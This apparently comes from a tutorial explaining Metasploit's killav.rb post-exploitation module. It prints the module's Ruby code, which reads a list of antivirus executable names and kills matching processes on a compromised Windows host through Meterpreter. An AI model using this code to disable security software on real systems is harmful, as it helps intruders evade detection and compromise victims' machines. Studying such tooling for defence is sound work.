Let's start with the basic understanding, once you have a meterpreter you get access to the modules of metasploit that perform post exploitation activites. Now any activity that you initiate lets say killav.rb. The code in this file is interacting with metasploit meterpreter module that you have and it uses RailGun. Railgun is a very powerful post exploitation feature exclusive to Windows Meterpreter. It allows you to have complete control of your target machine's Windows API. It passes the instruction to the Target system.
Let me give you an insight to the code of killav.rb
def run
avs = ::File.read(::File.join(Msf::Config.data_directory, 'wordlists',
'***av_hips_executables.txt***')).strip
avs = Set.new(avs.split("\n"))
processes_found = 0
processes_killed = 0
client.sys.process.get_processes().each do |x|
next if skip_process_name?(x['name'].downcase)
vprint_status("Checking #{x['name'].downcase} ...")
if avs.include?(x['name'].downcase)
processes_found += 1
print_status("Attempting to terminate '#{x['name']}' (PID: #{x['pid']}) ...")
begin
client.sys.process.kill(x['pid'])
processes_killed += 1
print_good("#{x['name']} terminated.")
rescue Rex::Post::Meterpreter::RequestError
print_error("Failed to terminate '#{x['name']}' (PID: #{x['pid']}).")
end
end
end
If you notice the av_hips_executables.txt
(Note:This file will also be available in the metasploit app location /usr/share/metasploit-framework/data/wordlists/av_hips_executables.txt)
That file contains the list of all the known executables that are assosiated with a runnning Antivirus,the code after that is purely to detect its PID and kill the PID. And since all is passed via the meterpreter API. It does not depend on the client side if it has ruby or not.